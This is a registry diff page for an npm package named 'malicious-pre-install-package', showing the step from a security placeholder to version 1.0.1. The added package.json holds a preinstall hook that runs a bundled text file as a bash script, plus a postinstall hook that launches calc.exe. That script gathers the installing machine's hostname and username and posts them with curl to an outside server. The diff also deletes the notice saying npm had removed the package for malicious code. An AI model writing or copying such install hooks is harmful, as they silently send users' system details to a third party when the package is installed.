malicious-pre-install-package 0.0.1-security → 1.0.1

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of malicious-pre-install-package might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/package.json +18 -3
  2. package/suspiciousfile.txt +3 -0
  3. package/README.md +0 -5
package/package.json CHANGED
@@ -1,6 +1,21 @@
1
1
  {
2
2
  "name": "malicious-pre-install-package",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.1",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "bash suspiciousfile.txt",
8
+ "postinstall": "calc.exe",
9
+ "test": "echo \"Error: no test specified\" && exit 1"
10
+ },
11
+ "repository": {
12
+ "type": "git",
13
+ "url": "git+https://github.com/adriandersen/malicious-pre-install-package.git"
14
+ },
15
+ "author": "",
16
+ "license": "ISC",
17
+ "bugs": {
18
+ "url": "https://github.com/adriandersen/malicious-pre-install-package/issues"
19
+ },
20
+ "homepage": "https://github.com/adriandersen/malicious-pre-install-package#readme"
6
21
  }
package/suspiciousfile.txt ADDED
@@ -0,0 +1,3 @@
1
+ VAR=$HOSTNAME@$(whoami)
2
+ echo $VAR
3
+ curl -X POST -H "Content-Type: application/json" -d "{\"data\":\"$VAR\"}" https://api.uten.app/sec/dynamicdump/mpip
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=malicious-pre-install-package for more information.